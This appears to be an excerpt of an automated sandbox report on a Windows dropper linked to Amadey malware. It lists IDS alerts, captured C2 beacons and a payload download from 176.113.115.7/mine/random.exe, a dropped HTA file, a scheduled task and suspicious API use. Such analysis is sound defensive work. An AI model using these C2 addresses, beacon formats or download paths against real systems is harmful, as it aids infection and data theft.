                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00B0D3A9
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00B19B2B

                  Networking

                  Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49696 -> 176.113.115.6:80
                  Source: Malware configuration extractor | IPs: 176.113.115.6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 09 Mar 2025 12:45:02 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 09 Mar 2025 12:35:50 GMTETag: "1d9000-62fe818841936"Accept-Ranges: bytesContent-Length: 1937408Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 c0 01 00 00 00 00 00 00 70 4d 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4d 00 00 04 00 00 15 50 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 e0 06 00 6b 00 00 00 00 d0 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 58 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 57 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 06 00 00 10 00 00 00 d6 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 
73 72 63 00 00 00 88 03 00 00 00 d0 06 00 00 04 00 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 06 00 00 02 00 00 00 ea 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2b 00 00 f0 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6f 75 72 66 74 70 75 00 80 1a 00 00 e0 32 00 00 7c 1a 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 79 62 61 78 76 62 63 00 10 00 00 00 60 4d 00 00 04 00 00 00 6a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4d 00 00 22 00 00 00 6e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 Host: 176.113.115.7 Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected (13 identical requests): POST /Ni9kiput/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 176.113.115.6 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global traffic | HTTP traffic detected (13 identical requests): POST /Ni9kiput/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 176.113.115.6 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
                  Source: Joe Sandbox View | IP Address: 176.113.115.7
                  Source: Joe Sandbox View | ASN Name: SELECTELRU
                  Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.7 (reported 50 times)
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B1CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent | 0_2_00B1CF1A
                  Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 Host: 176.113.115.7 Connection: Keep-Alive
                  Source: unknown | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 176.113.115.6 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.6/
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A55000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.6/Ni9kiput/index.
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000016.00000002.2111635363.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php0
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpO
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpU
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpf
                  Source: rapes.exe, 00000016.00000002.2111635363.0000000000A55000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpi
                  Source: powershell.exe, 00000005.00000002.906753579.0000000004707000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7
                  Source: powershell.exe, 00000008.00000002.956274416.0000020040AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.955094111.000002003EDD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.956274416.0000020040D0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/random.exe
                  Source: svchost.exe, 0000000F.00000002.2116528091.000002DDA0E97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
                  Source: qmgr.db.15.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: qmgr.db.15.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.15.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: qmgr.db.15.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: qmgr.db.15.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: qmgr.db.15.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: edb.log.15.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: powershell.exe, 00000005.00000002.915317498.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.998194398.0000020050C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.998194398.0000020050B50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000008.00000002.956274416.0000020040D0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000005.00000002.906753579.00000000045B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.956274416.0000020040AE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000008.00000002.956274416.0000020040D0C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000008.00000002.956274416.0000020040AE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000005.00000002.906753579.00000000045B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBNr
                  Source: powershell.exe, 00000008.00000002.998194398.0000020050B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000008.00000002.998194398.0000020050B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000008.00000002.998194398.0000020050B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                  Source: svchost.exe, 0000000F.00000003.1203271669.000002DDA0CB0000.00000004.00000800.00020000.00000000.sdmp, edb.log.15.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                  Source: powershell.exe, 00000008.00000002.956274416.0000020040D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000005.00000002.906753579.0000000004D93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.956274416.0000020041C3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000005.00000002.915317498.0000000005617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.998194398.0000020050C93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.998194398.0000020050B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00B0AA57
                  Source: C:\Users\user\Desktop\uw7A6EF76R.exeCode function: 0_2_00B39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B39576

                  System Summary

Source: uw7A6EF76R.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: uw7A6EF76R.exe, 00000000.00000002.870769172.0000000000B62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: uw7A6EF76R.exe, 00000000.00000002.870769172.0000000000B62000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: uw7A6EF76R.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: uw7A6EF76R.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | File created: C:\Users\user\AppData\Local\Temp\OPrA2uVEu.hta
Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr | Static PE information: section name:
Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr | Static PE information: section name: .idata
Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr | Static PE information: section name:
Source: rapes.exe.10.dr | Static PE information: section name:
Source: rapes.exe.10.dr | Static PE information: section name: .idata
Source: rapes.exe.10.dr | Static PE information: section name:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B0D5EB: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B0E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | File created: C:\Windows\Tasks\rapes.job
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AA8060
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B12046
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B08298
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00ADE4FF
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AD676B
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00ACCAA0
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AACAF0
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00ABCC39
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AD6DD9
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00ABD064
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AA91C0
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00ABB119
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AC1394
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AC1706
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AC781B
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AC19B0
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AA7920
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AB997D
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AC7A4A
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AC7CA7
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AC1C77
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AD9EEE
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B2BE44
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AC1F32
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00EF61F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00EFB700
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00F318D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00F35CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00F1B4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00F34047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00F22C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00F35DF4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00EF51A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00EF4EF0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00F1F6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 22_2_00F2C6DD
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: String function: 00AA9CB3 appears 31 times
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: String function: 00AC0A30 appears 41 times
Source: uw7A6EF76R.exe, 00000000.00000003.862977854.000000000155E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs uw7A6EF76R.exe
Source: uw7A6EF76R.exe, 00000000.00000003.862977854.000000000155E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename16LE vs uw7A6EF76R.exe
Source: uw7A6EF76R.exe, 00000000.00000003.868925168.0000000001416000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAMEU vs uw7A6EF76R.exe
Source: uw7A6EF76R.exe, 00000000.00000003.869723233.0000000001423000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAMEU vs uw7A6EF76R.exe
Source: uw7A6EF76R.exe, 00000000.00000003.870275441.0000000001423000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAMEU vs uw7A6EF76R.exe
Source: uw7A6EF76R.exe, 00000000.00000002.871222914.0000000001429000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAMEU vs uw7A6EF76R.exe
Source: uw7A6EF76R.exe, 00000000.00000003.870023012.0000000001565000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs uw7A6EF76R.exe
Source: uw7A6EF76R.exe, 00000000.00000003.870023012.0000000001565000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename16LE vs uw7A6EF76R.exe
Source: uw7A6EF76R.exe, 00000000.00000003.870411949.0000000001425000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAMEU vs uw7A6EF76R.exe
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: uw7A6EF76R.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr | Static PE information: Section: ZLIB complexity 0.9982244318181818
Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE.5.dr | Static PE information: Section: pourftpu ZLIB complexity 0.9944845824115044
Source: rapes.exe.10.dr | Static PE information: Section: ZLIB complexity 0.9982244318181818
Source: rapes.exe.10.dr | Static PE information: Section: pourftpu ZLIB complexity 0.9944845824115044
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@25/13@0/3
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B137B5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B010BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00B1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Code function: 0_2_00AA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2636:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: uw7A6EF76R.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\uw7A6EF76R.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: uw7A6EF76R.exe | Virustotal: Detection: 57%
Source: uw7A6EF76R.exe | ReversingLabs: Detection: 47%
Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | String found in binary or memory: " /add /y
Source: TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXE | String found in binary or memory: " /add
Source: rapes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe | String found in binary or memory: " /add
Source: rapes.exe | String found in binary or memory: " /add /y
Source: unknown | Process created: C:\Users\user\Desktop\uw7A6EF76R.exe "C:\Users\user\Desktop\uw7A6EF76R.exe"
